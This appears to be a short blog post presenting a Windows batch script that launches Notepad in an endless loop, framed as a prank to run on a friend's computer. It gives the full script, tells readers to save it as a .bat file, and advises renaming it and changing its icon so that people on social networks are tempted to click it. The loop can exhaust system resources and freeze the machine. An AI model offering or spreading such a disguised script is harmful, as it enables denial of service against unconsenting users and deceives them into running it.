Menu

Open Notepad continuously

                                 
Open Notepad continuously in your friend's computer:
1. Open Notepad ( Search it in start menu )
2. Now simply copy and paste the below script into the notepad.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
3. Now just save this file as Anything.bat ( Remember the .bat is really important so do put it)
4. So now just enjoy sharing this file by uploading it to social networks website, now remember to change its name and icon to something more exciting to click.

No comments:

Post a Comment